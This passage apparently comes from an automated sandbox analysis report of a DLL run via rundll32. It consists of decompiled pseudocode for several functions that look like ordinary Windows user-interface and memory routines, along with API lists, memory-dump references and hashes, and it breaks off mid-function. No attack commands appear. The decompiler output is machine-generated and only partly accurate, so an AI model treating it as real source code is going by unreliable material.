                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeIconTask$DestroyExtractFromH_prolog3String
                                                                                                        • String ID:
                                                                                                        • API String ID: 2818569797-0
                                                                                                        • Opcode ID: 0ba7340fa8f91b31ad85c115f08953dca0ffc2acd6fe494c9afa468dbd9543fc
                                                                                                        • Instruction ID: f2acac351f5096b2c127d7cff4df37ed17ab9ecce8ccf1ff20177b1ffcb83c7c
                                                                                                        • Opcode Fuzzy Hash: 0ba7340fa8f91b31ad85c115f08953dca0ffc2acd6fe494c9afa468dbd9543fc
                                                                                                        • Instruction Fuzzy Hash: 73515079500148AFDB06EFA0CC96EEE3B69EF05396F104219F9166B1E2DF35BA04C761
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002332D, Relevance: 7.7, APIs: 5, Instructions: 162stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1002332D(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
				signed int _t81;
				intOrPtr _t83;
				void* _t89;
				intOrPtr _t94;
				CHAR** _t96;
				signed int _t99;
				signed int _t101;
				signed int _t106;
				intOrPtr _t108;
				CHAR** _t115;
				int _t118;
				CHAR** _t120;
				int _t123;
				signed int _t124;
				void* _t128;
				void* _t133;
				void* _t146;
				signed int _t148;
				void* _t150;
				signed short* _t154;

				_t149 = __esi;
				_t146 = __edx;
				_t129 = __ecx;
				_push(0x188);
				E1003EE82(0x100550c7, __ebx, __edi, __esi);
				_t128 = __ecx;
				_t148 = 0;
				 *(_t150 - 0x10) = 0;
				if( *((intOrPtr*)(_t150 + 8)) != 0) {
					L29:
					_push(_t148);
					_push(0x14000c);
					_push(1);
					E100252DF(_t128, _t150 - 0x194, _t148, _t149, __eflags);
					 *(_t150 - 4) = 3;
					E1002554D(_t150 - 0x194);
					_t81 =  *(_t128 + 0x70);
					__eflags = _t81 - _t148;
					if(_t81 != _t148) {
						E100297B1(_t81);
					}
					_t82 =  *(_t128 + 0x74);
					__eflags =  *(_t128 + 0x74) - _t148;
					if(__eflags != 0) {
						E100297B1(_t82);
					}
					_t83 =  *((intOrPtr*)(_t150 - 0x120));
					 *(_t128 + 0x70) =  *(_t83 + 8);
					 *(_t128 + 0x74) =  *(_t83 + 0xc);
					_t133 = _t150 - 0x194;
					L34:
					 *(_t150 - 4) =  *(_t150 - 4) | 0xffffffff;
					_t85 = E100099E7(_t133, _t148, _t149,  *(_t150 - 4));
					L35:
					return E1003EF21(_t85);
				}
				_t89 =  *(__ecx + 0x74);
				if(_t89 == 0) {
					goto L29;
				}
				_t149 = GlobalLock(_t89);
				_t154 = _t149;
				_t85 = 0 | _t154 == 0x00000000;
				_t155 = _t154 == 0;
				if(_t154 == 0) {
					_t85 = E1000836F(_t128, _t129, 0, _t149, _t155);
				}
				_t156 = _t149[3] & 0x00000001;
				if((_t149[3] & 0x00000001) == 0) {
					goto L35;
				}
				_push(_t148);
				_push(0x14000c);
				_push(1);
				E100252DF(_t128, _t150 - 0xd8, _t148, _t149, _t156);
				 *(_t150 - 4) = _t148;
				if(E1002554D(_t150 - 0xd8) != 0) {
					_t94 =  *((intOrPtr*)(_t150 - 0x64));
					__eflags =  *((intOrPtr*)(_t94 + 0xc)) - _t148;
					if( *((intOrPtr*)(_t94 + 0xc)) != _t148) {
						_t96 = E10025560(_t150 - 0xd8, _t150 - 0x18);
						_t148 = lstrcmpA;
						 *(_t150 - 4) = 1;
						 *(_t150 - 0x10) = 1;
						_t99 = lstrcmpA(_t149 + ( *_t149 & 0x0000ffff),  *_t96);
						__eflags = _t99;
						if(_t99 != 0) {
							L14:
							 *((char*)(_t150 + 0xb)) = 1;
							L15:
							__eflags =  *(_t150 - 0x10) & 0x00000004;
							if(( *(_t150 - 0x10) & 0x00000004) != 0) {
								 *(_t150 - 0x10) =  *(_t150 - 0x10) & 0xfffffffb;
								__eflags =  *((intOrPtr*)(_t150 - 0x1c)) + 0xfffffff0;
								E10001280( *((intOrPtr*)(_t150 - 0x1c)) + 0xfffffff0, _t146);
							}
							__eflags =  *(_t150 - 0x10) & 0x00000002;
							if(( *(_t150 - 0x10) & 0x00000002) != 0) {
								 *(_t150 - 0x10) =  *(_t150 - 0x10) & 0xfffffffd;
								__eflags =  *((intOrPtr*)(_t150 - 0x14)) + 0xfffffff0;
								E10001280( *((intOrPtr*)(_t150 - 0x14)) + 0xfffffff0, _t146);
							}
							 *(_t150 - 4) =  *(_t150 - 4) & 0x00000000;
							__eflags =  *(_t150 - 0x10) & 0x00000001;
							if(( *(_t150 - 0x10) & 0x00000001) != 0) {
								__eflags =  *((intOrPtr*)(_t150 - 0x18)) + 0xfffffff0;
								E10001280( *((intOrPtr*)(_t150 - 0x18)) + 0xfffffff0, _t146);
							}
							__eflags =  *((char*)(_t150 + 0xb));
							if( *((char*)(_t150 + 0xb)) == 0) {
								_t101 =  *( *((intOrPtr*)(_t150 - 0x64)) + 8);
								__eflags = _t101;
								if(_t101 != 0) {
									E100297B1(_t101);
								}
								_t103 =  *( *((intOrPtr*)(_t150 - 0x64)) + 0xc);
								__eflags =  *( *((intOrPtr*)(_t150 - 0x64)) + 0xc);
								if(__eflags != 0) {
									E100297B1(_t103);
								}
							} else {
								_t106 =  *(_t128 + 0x70);
								__eflags = _t106;
								if(_t106 != 0) {
									E100297B1(_t106);
								}
								E100297B1( *(_t128 + 0x74));
								_t108 =  *((intOrPtr*)(_t150 - 0x64));
								 *(_t128 + 0x70) =  *(_t108 + 8);
								 *(_t128 + 0x74) =  *(_t108 + 0xc);
							}
							goto L6;
						}
						_t115 = E10025591(_t150 - 0xd8, _t150 - 0x14);
						 *(_t150 - 4) = 2;
						 *(_t150 - 0x10) = 3;
						_t118 = lstrcmpA(_t149 + (_t149[1] & 0x0000ffff),  *_t115);
						__eflags = _t118;
						if(_t118 != 0) {
							goto L14;
						}
						_t120 = E100255C3(_t150 - 0xd8, _t150 - 0x1c);
						 *(_t150 - 0x10) = 7;
						_t123 = lstrcmpA(_t149 + (_t149[2] & 0x0000ffff),  *_t120);
						__eflags = _t123;
						 *((char*)(_t150 + 0xb)) = 0;
						if(_t123 == 0) {
							goto L15;
						}
						goto L14;
					}
					_t124 =  *(_t128 + 0x70);
					__eflags = _t124 - _t148;
					if(_t124 != _t148) {
						E100297B1(_t124);
					}
					E100297B1( *(_t128 + 0x74));
					 *(_t128 + 0x70) = _t148;
					 *(_t128 + 0x74) = _t148;
				}
				L6:
				_t133 = _t150 - 0xd8;
				goto L34;
			}























                                                                                                        0x1002332d
                                                                                                        0x1002332d
                                                                                                        0x1002332d
                                                                                                        0x1002332d
                                                                                                        0x10023337
                                                                                                        0x1002333c
                                                                                                        0x1002333e
                                                                                                        0x10023343
                                                                                                        0x10023346
                                                                                                        0x100234ed
                                                                                                        0x100234ed
                                                                                                        0x100234ee
                                                                                                        0x100234f3
                                                                                                        0x100234fb
                                                                                                        0x10023506
                                                                                                        0x1002350d
                                                                                                        0x10023512
                                                                                                        0x10023515
                                                                                                        0x10023517
                                                                                                        0x1002351a
                                                                                                        0x1002351a
                                                                                                        0x1002351f
                                                                                                        0x10023522
                                                                                                        0x10023524
                                                                                                        0x10023527
                                                                                                        0x10023527
                                                                                                        0x1002352c
                                                                                                        0x10023535
                                                                                                        0x1002353b
                                                                                                        0x1002353e
                                                                                                        0x10023544
                                                                                                        0x10023544
                                                                                                        0x10023548
                                                                                                        0x1002354d
                                                                                                        0x10023552
                                                                                                        0x10023552
                                                                                                        0x1002334c
                                                                                                        0x10023351
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002335e
                                                                                                        0x10023362
                                                                                                        0x10023364
                                                                                                        0x10023367
                                                                                                        0x10023369
                                                                                                        0x1002336b
                                                                                                        0x1002336b
                                                                                                        0x10023370
                                                                                                        0x10023374
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002337a
                                                                                                        0x1002337b
                                                                                                        0x10023380
                                                                                                        0x10023388
                                                                                                        0x10023393
                                                                                                        0x1002339d
                                                                                                        0x100233aa
                                                                                                        0x100233ad
                                                                                                        0x100233b0
                                                                                                        0x100233d9
                                                                                                        0x100233e3
                                                                                                        0x100233ec
                                                                                                        0x100233f0
                                                                                                        0x100233f7
                                                                                                        0x100233f9
                                                                                                        0x100233fb
                                                                                                        0x10023452
                                                                                                        0x10023452
                                                                                                        0x10023456
                                                                                                        0x10023456
                                                                                                        0x1002345a
                                                                                                        0x1002345f
                                                                                                        0x10023463
                                                                                                        0x10023466
                                                                                                        0x10023466
                                                                                                        0x1002346b
                                                                                                        0x1002346f
                                                                                                        0x10023474
                                                                                                        0x10023478
                                                                                                        0x1002347b
                                                                                                        0x1002347b
                                                                                                        0x10023480
                                                                                                        0x10023484
                                                                                                        0x10023488
                                                                                                        0x1002348d
                                                                                                        0x10023490
                                                                                                        0x10023490
                                                                                                        0x10023495
                                                                                                        0x10023499
                                                                                                        0x100234c7
                                                                                                        0x100234ca
                                                                                                        0x100234cc
                                                                                                        0x100234cf
                                                                                                        0x100234cf
                                                                                                        0x100234d7
                                                                                                        0x100234da
                                                                                                        0x100234dc
                                                                                                        0x100234e3
                                                                                                        0x100234e3
                                                                                                        0x1002349b
                                                                                                        0x1002349b
                                                                                                        0x1002349e
                                                                                                        0x100234a0
                                                                                                        0x100234a3
                                                                                                        0x100234a3
                                                                                                        0x100234ab
                                                                                                        0x100234b0
                                                                                                        0x100234b6
                                                                                                        0x100234bc
                                                                                                        0x100234bc
                                                                                                        0x00000000
                                                                                                        0x10023499
                                                                                                        0x10023407
                                                                                                        0x10023415
                                                                                                        0x1002341c
                                                                                                        0x10023423
                                                                                                        0x10023425
                                                                                                        0x10023427
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023433
                                                                                                        0x10023441
                                                                                                        0x10023448
                                                                                                        0x1002344a
                                                                                                        0x1002344c
                                                                                                        0x10023450
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023450
                                                                                                        0x100233b2
                                                                                                        0x100233b5
                                                                                                        0x100233b7
                                                                                                        0x100233ba
                                                                                                        0x100233ba
                                                                                                        0x100233c2
                                                                                                        0x100233c7
                                                                                                        0x100233ca
                                                                                                        0x100233ca
                                                                                                        0x1002339f
                                                                                                        0x1002339f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10023337
                                                                                                        • GlobalLock.KERNEL32 ref: 10023358
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 100233F7
                                                                                                        • lstrcmpA.KERNEL32(?,00000000,?), ref: 10023423
                                                                                                        • lstrcmpA.KERNEL32(?,00000000,?), ref: 10023448
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 569107404-0
                                                                                                        • Opcode ID: 2f6e357e834fda0ac90e369ab9a1ec54d2ff6938a07329c3e7fb7dbdc46fb7b3
                                                                                                        • Instruction ID: d605c4bb8609d9c7ac57807ca87a441f901d374d81bba1cd389bd398f9b1ccbb
                                                                                                        • Opcode Fuzzy Hash: 2f6e357e834fda0ac90e369ab9a1ec54d2ff6938a07329c3e7fb7dbdc46fb7b3
                                                                                                        • Instruction Fuzzy Hash: 0561A0749003159FDB02DF64DC95BADB7F5EF00394F908689E859AB2A6DB70EE84CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10023AD4, Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E10023AD4(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t46;
				int _t48;
				int _t50;
				signed int _t57;
				int _t71;
				void* _t73;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				int _t78;
				signed int _t85;
				int _t88;
				signed int _t95;
				void* _t97;
				void* _t98;
				struct tagRECT* _t100;

				_t85 = _a4 * 0x28;
				_t97 = __ecx;
				_t98 = _t85 +  *((intOrPtr*)(__ecx + 0xb0));
				E10023A59(__ecx, __edx, __eflags,  &_v12);
				_t88 =  *(_t98 + 0x24);
				_t95 = 0 |  *(_t98 + 0x20) - _t88 < 0x00000000;
				_t46 =  *((intOrPtr*)(__ecx + 0x10c));
				if(_t46 == 0) {
					 *(_t98 + 0x18) =  *(_t98 + 0x20);
					_t48 =  *(_t98 + 0x24);
					goto L12;
				} else {
					_t73 = _t46 - 1;
					if(_t73 == 0) {
						__eflags = _t95;
						 *(_t98 + 0x1c) = _t88;
						_t74 =  *(_t98 + 0x20);
						if(_t95 == 0) {
							_t76 = _t74 * 3 - _t88;
							__eflags = _t76;
						} else {
							_t76 = _t74 + _t88;
						}
						asm("cdq");
						_t77 = _t76 - _t95;
						__eflags = _t77;
						_t78 = _t77 >> 1;
						goto L10;
					} else {
						if(_t73 == 1) {
							if(_t95 == 0) {
								 *(_t98 + 0x1c) = _t88;
								_t78 =  *(_t98 + 0x20) +  *(_t98 + 0x20) -  *(_t98 + 0x24);
								L10:
								 *(_t98 + 0x18) = _t78;
							} else {
								_t48 = 1;
								 *(_t98 + 0x18) = 1;
								L12:
								 *(_t98 + 0x1c) = _t48;
							}
						}
					}
				}
				_v20 = MulDiv( *(_t98 + 0x10),  *(_t98 + 0x18),  *(_t98 + 0x1c));
				_t50 = MulDiv( *(_t98 + 0x14),  *(_t98 + 0x18),  *(_t98 + 0x1c));
				_t100 =  *((intOrPtr*)(_t97 + 0xb0)) + _t85;
				SetRect(_t100, 8, 8, _v20 + 0xb, _t50 + 0xb);
				if( *((intOrPtr*)(_t97 + 0x10c)) != 0) {
					_push(0x1005e2e8);
					_push( &_v12);
					_push(_t100->bottom - _t100->top + 0x10);
					_t57 = _t100->right - _t100->left + 0x10;
					__eflags = _t57;
					_push(_t57);
					_push(1);
					return E100332F3(_t85, _t97, _t97, _t100, _t57);
				}
				asm("cdq");
				asm("cdq");
				_t71 = OffsetRect(_t100, (_t100->left - _t100->right + _v12 - _t95 >> 1) - 1, (_t100->top - _t100->bottom + _v8 - _t95 >> 1) - 1);
				if(_a4 == 1) {
					return OffsetRect(_t100,  *(_t97 + 0x11c), 0);
				}
				return _t71;
			}


























                                                                                                        0x10023ade
                                                                                                        0x10023ae3
                                                                                                        0x10023aeb
                                                                                                        0x10023af2
                                                                                                        0x10023af7
                                                                                                        0x10023b05
                                                                                                        0x10023b08
                                                                                                        0x10023b0b
                                                                                                        0x10023b4e
                                                                                                        0x10023b51
                                                                                                        0x00000000
                                                                                                        0x10023b0d
                                                                                                        0x10023b0d
                                                                                                        0x10023b0e
                                                                                                        0x10023b2e
                                                                                                        0x10023b30
                                                                                                        0x10023b33
                                                                                                        0x10023b36
                                                                                                        0x10023b3f
                                                                                                        0x10023b3f
                                                                                                        0x10023b38
                                                                                                        0x10023b38
                                                                                                        0x10023b38
                                                                                                        0x10023b41
                                                                                                        0x10023b42
                                                                                                        0x10023b42
                                                                                                        0x10023b44
                                                                                                        0x00000000
                                                                                                        0x10023b10
                                                                                                        0x10023b11
                                                                                                        0x10023b15
                                                                                                        0x10023b21
                                                                                                        0x10023b29
                                                                                                        0x10023b46
                                                                                                        0x10023b46
                                                                                                        0x10023b17
                                                                                                        0x10023b19
                                                                                                        0x10023b1a
                                                                                                        0x10023b54
                                                                                                        0x10023b54
                                                                                                        0x10023b54
                                                                                                        0x10023b15
                                                                                                        0x10023b11
                                                                                                        0x10023b0e
                                                                                                        0x10023b69
                                                                                                        0x10023b72
                                                                                                        0x10023b8d
                                                                                                        0x10023b90
                                                                                                        0x10023b9d
                                                                                                        0x10023be5
                                                                                                        0x10023bed
                                                                                                        0x10023bf1
                                                                                                        0x10023bf2
                                                                                                        0x10023bf2
                                                                                                        0x10023bf5
                                                                                                        0x10023bf6
                                                                                                        0x00000000
                                                                                                        0x10023bfa
                                                                                                        0x10023bae
                                                                                                        0x10023bbd
                                                                                                        0x10023bc5
                                                                                                        0x10023bcb
                                                                                                        0x00000000
                                                                                                        0x10023bd6
                                                                                                        0x10023c03

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Offset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3858320380-0
                                                                                                        • Opcode ID: c682565cb4de917052e743f99ea10065266852cd23b399b94ce28ed69b40e940
                                                                                                        • Instruction ID: 9087e05f941062063cf6555c63204954d934a2a51f05fe36132e05c803bd4650
                                                                                                        • Opcode Fuzzy Hash: c682565cb4de917052e743f99ea10065266852cd23b399b94ce28ed69b40e940
                                                                                                        • Instruction Fuzzy Hash: BF415D71600A06AFD725CF69CD85A9ABBF5FF08300F448A18EA8AD7A51D730F945CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100332F3, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100332F3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				struct tagPOINT* _t75;
				long* _t77;
				long* _t80;
				struct tagPOINT* _t81;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				struct tagPOINT* _t97;
				signed int _t98;
				signed int _t107;
				void* _t115;
				signed int _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				void* _t122;

				_t122 = __eflags;
				_push(0x18);
				E1003EE82(0x100560ee, __ebx, __edi, __esi);
				_t120 = __ecx;
				 *(_t121 - 0x10) =  *(__ecx + 0x5c);
				 *(__ecx + 0x5c) =  *(_t121 + 8);
				 *((intOrPtr*)(__ecx + 0x60)) =  *((intOrPtr*)(_t121 + 0xc));
				_push(0);
				 *((intOrPtr*)(__ecx + 0x64)) =  *((intOrPtr*)(_t121 + 0x10));
				E10009091(__ebx, _t121 - 0x24, __edi, __ecx, _t122);
				 *(_t121 - 4) =  *(_t121 - 4) & 0x00000000;
				E100086A2(_t121 - 0x24,  *((intOrPtr*)(_t120 + 0x5c)));
				_t115 = LPtoDP;
				_t75 = _t120 + 0x68;
				_t75->x =  *(_t120 + 0x60);
				_t75->y =  *(_t120 + 0x64);
				LPtoDP( *(_t121 - 0x1c), _t75, 1);
				_t77 =  *(_t121 + 0x14);
				_t97 = _t120 + 0x70;
				_t97->x =  *_t77;
				_t97->y = _t77[1];
				LPtoDP( *(_t121 - 0x1c), _t97, 1);
				_t80 =  *(_t121 + 0x18);
				_t81 = _t120 + 0x78;
				_t81->x =  *_t80;
				_t81->y = _t80[1];
				LPtoDP( *(_t121 - 0x1c), _t81, 1);
				_t83 =  *(_t120 + 0x6c);
				if(_t83 < 0) {
					 *(_t120 + 0x6c) =  ~_t83;
				}
				_t84 =  *(_t120 + 0x74);
				if(_t84 < 0) {
					 *(_t120 + 0x74) =  ~_t84;
				}
				_t85 =  *(_t120 + 0x7c);
				_t125 = _t85;
				if(_t85 < 0) {
					 *(_t120 + 0x7c) =  ~_t85;
				}
				 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
				_t86 = E100090E5(_t97, _t121 - 0x24, _t115, _t120, _t125);
				_t107 = 0xa;
				if(_t97->x == 0) {
					_t92 =  *(_t120 + 0x68);
					asm("cdq");
					_t118 = _t107;
					_t86 = _t92 / _t118;
					_t97->x = _t92 / _t118;
				}
				if( *(_t120 + 0x74) == 0) {
					_t91 =  *(_t120 + 0x6c);
					asm("cdq");
					_t117 = _t107;
					_t86 = _t91 / _t117;
					 *(_t120 + 0x74) = _t91 / _t117;
				}
				if( *(_t120 + 0x78) == 0) {
					_t90 = _t97->x;
					asm("cdq");
					_t98 = _t107;
					_t86 = _t90 / _t98;
					 *(_t120 + 0x78) = _t90 / _t98;
				}
				if( *(_t120 + 0x7c) == 0) {
					_t89 =  *(_t120 + 0x74);
					asm("cdq");
					_t86 = _t89 / _t107;
					 *(_t120 + 0x7c) = _t89 / _t107;
				}
				if( *(_t120 + 0x20) != 0) {
					E10032C01(_t120);
					_t86 =  *(_t121 - 0x10);
					if( *(_t121 - 0x10) !=  *((intOrPtr*)(_t120 + 0x5c))) {
						_t86 = InvalidateRect( *(_t120 + 0x20), 0, 1);
					}
				}
				return E1003EF21(_t86);
			}























                                                                                                        0x100332f3
                                                                                                        0x100332f3
                                                                                                        0x100332fa
                                                                                                        0x100332ff
                                                                                                        0x10033304
                                                                                                        0x1003330a
                                                                                                        0x10033310
                                                                                                        0x10033316
                                                                                                        0x1003331b
                                                                                                        0x1003331e
                                                                                                        0x10033326
                                                                                                        0x1003332d
                                                                                                        0x10033335
                                                                                                        0x1003333b
                                                                                                        0x10033344
                                                                                                        0x10033349
                                                                                                        0x1003334c
                                                                                                        0x1003334e
                                                                                                        0x10033356
                                                                                                        0x1003335f
                                                                                                        0x10033361
                                                                                                        0x10033364
                                                                                                        0x10033366
                                                                                                        0x1003336e
                                                                                                        0x10033377
                                                                                                        0x10033379
                                                                                                        0x1003337c
                                                                                                        0x1003337e
                                                                                                        0x10033383
                                                                                                        0x10033387
                                                                                                        0x10033387
                                                                                                        0x1003338a
                                                                                                        0x1003338f
                                                                                                        0x10033393
                                                                                                        0x10033393
                                                                                                        0x10033396
                                                                                                        0x10033399
                                                                                                        0x1003339b
                                                                                                        0x1003339f
                                                                                                        0x1003339f
                                                                                                        0x100333a2
                                                                                                        0x100333a9
                                                                                                        0x100333b3
                                                                                                        0x100333b4
                                                                                                        0x100333b6
                                                                                                        0x100333b9
                                                                                                        0x100333ba
                                                                                                        0x100333bc
                                                                                                        0x100333be
                                                                                                        0x100333be
                                                                                                        0x100333c4
                                                                                                        0x100333c6
                                                                                                        0x100333c9
                                                                                                        0x100333ca
                                                                                                        0x100333cc
                                                                                                        0x100333ce
                                                                                                        0x100333ce
                                                                                                        0x100333d6
                                                                                                        0x100333d8
                                                                                                        0x100333da
                                                                                                        0x100333db
                                                                                                        0x100333dd
                                                                                                        0x100333df
                                                                                                        0x100333df
                                                                                                        0x100333e5
                                                                                                        0x100333e7
                                                                                                        0x100333ea
                                                                                                        0x100333eb
                                                                                                        0x100333ed
                                                                                                        0x100333ed
                                                                                                        0x100333f3
                                                                                                        0x100333f7
                                                                                                        0x100333fc
                                                                                                        0x10033402
                                                                                                        0x1003340a
                                                                                                        0x1003340a
                                                                                                        0x10033402
                                                                                                        0x10033415

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 100332FA
                                                                                                          • Part of subcall function 10009091: __EH_prolog3.LIBCMT ref: 10009098
                                                                                                          • Part of subcall function 10009091: GetWindowDC.USER32(00000000,00000004,10033323,00000000,00000018,10023BFF,00000001,?,?,?,1005E2E8), ref: 100090C4
                                                                                                          • Part of subcall function 100086A2: SetMapMode.GDI32(?,?), ref: 100086BB
                                                                                                          • Part of subcall function 100086A2: SetMapMode.GDI32(?,?), ref: 100086C9
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 1003334C
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 10033364
                                                                                                        • LPtoDP.GDI32(?,?,00000001), ref: 1003337C
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1003340A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Mode$InvalidateRectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1124340077-0
                                                                                                        • Opcode ID: 58117642c7e16fb45c6b37f60c24110a7b854ed270339433ebe9bd66b8291f97
                                                                                                        • Instruction ID: cbb92d3347adb29273bfc1453446e38b95cb1432747feed1f6ca5e5dedf14878
                                                                                                        • Opcode Fuzzy Hash: 58117642c7e16fb45c6b37f60c24110a7b854ed270339433ebe9bd66b8291f97
                                                                                                        • Instruction Fuzzy Hash: 8741D370A40B098FDB22CF29C881A5AB7E5FB48704F11892DE596DB7A1D771E940CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000AEEB, Relevance: 7.6, APIs: 5, Instructions: 104stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E1000AEEB(void* _a4, short _a20, short _a24, short _a28, short _a32, short _a36, short _a40, WCHAR* _a44, WCHAR* _a48) {
				signed int _v8;
				char _v24;
				WCHAR* _v28;
				void* _v32;
				WCHAR* _v36;
				short _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				long _t48;
				void* _t49;
				WCHAR* _t67;
				void* _t70;
				WCHAR* _t72;
				short* _t73;
				short* _t76;
				signed int _t78;
				void* _t79;

				_t45 =  *0x10072650; // 0xb5e27fef
				_v8 = _t45 ^ _t78;
				_t67 = _a48;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t72 = _a44;
				_v36 = _t72;
				_v28 = _t67;
				if(_t72 == 0) {
					_t76 = 0;
				} else {
					_t76 = lstrlenW(_t72) + 1;
				}
				if(_t67 == 0 ||  *_t67 == 0) {
					_v28 = _t72;
					_t73 = _t76;
				} else {
					_t73 = lstrlenW(_t67) + 1;
				}
				_t48 = _t73 + _t76 + _t73 + _t76 + 0x34;
				_v40 = _t48;
				_t49 = GlobalAlloc(0x2042, _t48);
				_v32 = _t49;
				if(_t49 != 0) {
					_t67 = GlobalLock(_t49);
					if(_v36 == 0) {
						_t67[0x16] = _t67[0x16] & 0x00000000;
					} else {
						_t16 =  &(_t67[0x1a]); // 0x34
						_t67[0x16] = 0x34;
						E100011B0(_t67, _t73, _t76, _t78, _t16, _t76, _v36);
						_t79 = _t79 + 0xc;
					}
					if(_v28 == 0) {
						_t67[0x18] = _t67[0x18] & 0x00000000;
					} else {
						_t23 =  &(_t76[0x1a]); // 0x34
						_t67[0x18] = _t76 + _t23;
						E100011B0(_t67, _t73, _t76, _t78, _t67 + _t76 + _t23, _t73, _v28);
					}
					 *_t67 = _v40;
					_t67[0xa] = _a20;
					_t32 =  &(_t67[2]); // 0x4
					_t73 = _t32;
					_t76 =  &_v24;
					asm("movsd");
					_t67[0xc] = _a24;
					asm("movsd");
					_t67[0xe] = _a28;
					_t67[0x10] = _a32;
					asm("movsd");
					_t67[0x12] = _a36;
					asm("movsd");
					_t67[0x14] = _a40;
					GlobalUnlock(_v32);
					_t49 = _v32;
				}
